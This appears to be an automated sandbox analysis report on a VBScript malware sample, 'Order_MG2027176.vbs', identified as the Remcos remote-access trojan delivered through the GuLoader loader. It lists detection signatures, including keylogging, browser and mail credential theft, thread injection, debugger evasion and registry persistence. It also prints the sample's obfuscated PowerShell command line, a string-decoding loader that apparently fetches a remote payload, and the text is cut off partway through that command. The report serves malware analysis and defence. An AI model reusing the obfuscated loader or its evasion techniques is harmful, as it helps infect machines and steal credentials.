Edit tour
Windows
Analysis Report
Order_MG2027176.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5928 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Order _MG2027176 .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 5912 cmdline:
ping gorme zl_6777.67 77.6777.67 7e MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 5956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5976 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Unappr opriation smaamntern e Slaaenbr rene Forsg sarbejders Heiau #>; $Gaardvagt ers='Skval derkaal';< #Elicits T ppes Istan dsttelses Slavicist Phylarch # >;$Unhypno tizables=$ Urocentrum et204+$hos t.UI; func tion Nrigs tes($Epiph anizingsoc hronized70 ){If ($Unh ypnotizabl es) {$Kwan za++;}$Dap ifer=$Leis hmanic+$Ep iphanizing sochronize d70.'Lengt h'-$Kwanza ; for( $Ep iphanizing =4;$Epipha nizing -lt $Dapifer; $Epiphaniz ing+=5){$C rawlerize= $Epiphaniz ing;$Castr ato+=$Epip hanizingso chronized7 0[$Epiphan izing];$Ep iphanizing ndianize=' Fljtekedel s';}$Castr ato;}funct ion Depend ing($Pyotr ){ & ($T udsefisks3 3) ($Pyotr );}$Stvkna ppen=Nrigs tes 'Was M Ant.oDekaz RetriSubcl M.tilTetra Hvii/ ran ';$Stvknap pen+=Nrigs tes ' Nd,5 Fi,m. um0K ile Mi n(O verWSk,miN ympn ashd FedoForfwF o.ssUna Cr mNAn iTHa nd Tild1Hi th0Sard.Be la0U tr;Se ne BrugWBu t iblo nar e 6Tred4Fo .l; Fir Ne dsxPhre6,n de4 Un,;Ud fo Salmr J nvSpu : i ni1I co3 E nd1Jagt.Ll en0 Rep)Re vi yntGd w neMillcans gkAviao Fl y/ Agn2 ud 0Hand1Ric i0Spr,0Dag b1 F s0 Ud s1La.d tro F JaciHjti rNedgeOpst fTarvoP.ei xJoke/ Ag 1Cl i3 Kl, 1Futh.Rigs 0Kin. ';$R rfabrikker nes=Nrigst es 'DenauS ans UnmeO prer oeb-F orlATr,oG UviE ov NP yreTOrys ' ;$Huckster age=Nrigst es ' SmrhK aertBonut FilpKomms ab:Feld/Be y/Natat b iboThyrtTa nto L fpIn drlH.ana A rusSyvatPe an. U ecUd vaos rem P o/Un.rrMe df5 Arb/Ar ,tC SuroIn frsPrygtNo naiLgnafAn g,oMi lrLu kkmF rp.Sp e oArchc A ntx Tel '; $Oxeye=Nri gstes ' Om d>Bund ';$ Tudsefisks 33=Nrigste s ' AbrI P reERivaXKo n ';$Tilpl antet='Deu tonephron' ;$Uncaps=' \Cobbleris m.Ace';Dep ending (Nr igstes 'An at$ ProgS, efL Belo M azB ,nwAUn s LObje: a xiv nnESvu mr TabDChi nSDebaL,dl aIFanfGAfg hsAf,eI Ko pnsa,uDpel eEC urTte k=Anth$Unp ieSolsn Sm uvBipi:Und eaPreaPBo. sp .miDUfo ra IntT Po lA Phr+ Bo t$ OffuNon vNBlacC Ko laS appMa pS ni ');D epending ( Nrigstes ' ,ump$ U pg BemyLDepoO TurBProsa forelKas : pinL Cani MummmVandI Nut tDag a AntilAu,o= Perg$ Prih Af uTrocc KrisKAeros PrjsTa beE KvadRK geA pingGr,ne Im.. Hjes .lleP FacL SlaniHag T Ste (chiv$ SlouoInkax Dul.EAffaY Bl.eeTele) Anga ');De pending (N rigstes ' kid[C.ntn nscENudeT Fyk. PicsU d leEmneRT aktvNo eiS .waC CamES paspInteOK eywiI denf olktVignmm ostAPi fNh istaDetaGC anaED srRG ,la]Succ:W a,h:wilfSA juEOmdeCK illuSjllrG ramI WhiTV endyFordPT opsrFerrOS .ectDorioS ubuc S eoE f eL Wa, S tol=Fode B end[ ConNB ryse.efet yvt.StatsE nlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoW indlGudsTC ag YM topA ,toePrel]E nvi: agl:U dfrtRevilM atrsBack1 Viv2S mo ' );$Huckste rage=$Limi tal[0];$An